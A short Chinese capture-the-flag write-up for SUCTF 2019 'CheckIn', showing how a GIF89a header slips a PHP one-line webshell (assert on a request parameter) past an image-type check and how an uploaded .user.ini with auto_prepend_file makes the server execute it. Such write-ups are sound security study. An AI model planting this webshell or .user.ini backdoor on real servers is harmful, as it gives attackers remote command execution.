1. 程式人生 > 其它 >[SUCTF 2019]CheckIn 1

[SUCTF 2019]CheckIn 1

1.發現

1.開啟題目地址發現為檔案上傳,隨便上傳JPG/PHP/TXT檔案。

2.發現PHP檔案上傳不去,並發現exif_imagetype()函式

函式功能是讀取一個影象的第一個位元組並檢查其簽名。 在一句話前面加個GIF89a進行繞過

那麼現在的一句話如下,可以製作成圖片馬,但是需要解析成php

GIF89a
<script language='php'>assert($_REQUEST['cmd'])</script>

正常想到的是.htaccess,但是這個伺服器是nginx,而.htaccess是針對apache的

知識點

1)exif_imagetype()函式:

PHP: exif_imagetype - Manual

2.步驟

思路:上傳圖片馬,然後利用.user.ini解析圖片馬生成webshell

知識點

1).user.ini檔案構成的PHP後門:.user.ini檔案構成的PHP後門 - phith0n (wooyun.js.org)

1.生成圖片馬

2.生產.user.ini檔案

GIF89a
auto_prepend_file=shell.jpg

3.上傳.user.ini和圖片馬

4.然後根據上傳的路徑,找到上傳的Webshell,獲取flag。

3.參考

[SUCTF 2019]CheckIn - 高諾琪 - 部落格園 (cnblogs.com)